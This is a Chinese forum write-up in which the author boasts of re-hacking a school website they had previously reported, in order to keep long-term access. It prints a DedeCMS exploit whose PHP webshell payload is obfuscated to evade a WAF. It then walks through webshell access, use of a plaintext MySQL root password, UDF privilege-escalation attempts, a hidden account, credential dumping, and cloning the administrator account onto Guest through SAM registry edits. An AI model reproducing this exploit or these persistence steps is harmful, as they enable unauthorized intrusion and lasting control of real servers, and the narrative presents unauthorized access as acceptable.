作者：X_Al3r

来源：i春秋社区

00x01
话说在上次对已经要去的学习进行渗透测试后善良的我把洞丢给了老师（网站出问题了，老师找到我身上，不得不给！！！）为此，我跟老师成为了快乐的好基友，以至于我的权限掉了，这让我非常不开心，于是乎，又进行了二次渗透！并且这次我准备长期维权！

00x02
目标站：www.xxx.com//全程马赛克
Cms:二次开发dedecms
版本:20140814(在自己嘴残的情况下把自己所知道的洞都给说出去了，然后补了。)
使用nikto等工具扫均未果，在准备丢bugscan的时候想起土司大佬的文章，于是乎就开干了。
漏洞文件地址:/plus/flink_add.php

并且exp也已经公布，但是经过我的提醒后老师可能装了360等waf，我需要大致的修改下exp
Exp:

<?php //print_r($_SERVER); $referer = $_SERVER['HTTP_REFERER']; $dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php，取得dede后台的路径 //拼接 exp $muma='<'.'?'.'p'.'h'.'p'.' '.'$'.'a'.' '.'='.' '.'''.'b'.'''.';'.' '.'$'.'b'.' '.'='.' '.'P'.'O'.'S'.'T'.'['.'''.'x'.'''.']'.';'.' '.'@'.'e'.'v'.'a'.'l'.'('.'$'.'$'.'a'.')'.';'.' '.'?'.'>'; $exp='tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=rss.php'; $url = $dede_login.$exp; //echo $url; header("location: ".$url); // send mail coder exit(); ?>

这里可以看见$muma哪里的内容为<?php @eval($_POST[‘x’]; )?>然后用’.’分割开来的,按葫芦画瓢，构造一个过waf的一句即可
ps：$muma = '<'.'?'.'p'.'h'.'p'.' '.'$'.'a'.' '.'='.' '.'''.'b'.'''.';'.' '.'$'.'b'.' '.'='.' '.'P'.'O'.'S'.'T'.'['.'''.'x'.'''.']'.';'.' '.'@'.'e'.'v'.'a'.'l'.'('.'$'.'$'.'a'.')'.';'.' '.'?'.'>';
触发的时候会生成一个：include/taglib/rss.php
丢到一个站上准备套路老师（因为有权限写的，老师不会上当了。。。所以用小号还原下当时情况）

看样子已经触发了，访问下文件

文件存在，菜刀连接之~

熟悉的界面，继续寻找mysql root账号，在提权一次

这次pass竟然直接是明文，并且直接就是root,大吃一惊- -# 看来他以为不会再有人进来了，不过挺好，估计内部的洞都没修复。那么不用解释了，上大马，开车

Mysql版本：5.5.35
似乎跟以前没什么两样，那么先找一下路径好用来导出udf

安装路径：D:/MySQL/MySQL Server 5.5/，咦，安装路径变了
好吧，直接提权，先导出dll
导出成功，执行语句
这个版本的马发现导出成功了并不能执行命令，于是乎我又换了一个版本的马

What? 这次连导出也不能？吓得我去看了下目录

以为重命名不可覆盖，我又换了好几个名字发现确实写进去了。

然而却不能调用，于是抽支烟压压惊先
突然，猛地想起，我把web的权限已经提升为管理员了，应该可以直接执行命令

权限给降下来了，表示懵逼- -#    该怎么办呢？
然后，奇迹出现了，我的隐藏用户没被删，直接登陆服务器~~~~（大翻车）

发现没权限，于是乎又开始绕- -#

以管理员运行就有权限了

于是乎开始抓

既然说留权限，那么就克隆一个administrator吧
依次进入注册表HKEY_LOCAL_MACHINE---->SAM---->SAM
默认是没读取权限的

依次单击“查看”菜单----“刷新”，可以看到SAM下面的子项已经出来了。

进入到Users目录

可以看见，administrator对应着01F4

把F值保存一下，在找到guest对应的F值，复制进去就可以了
然后启动下Guset用户就可以了，当然，可以使用ca等工具更快捷

因为用户不能添加到管理组，所以才克隆用户，这个在上次渗透中有提到过。另外就是管理组克隆可以用来创建超级隐藏用户等姿势。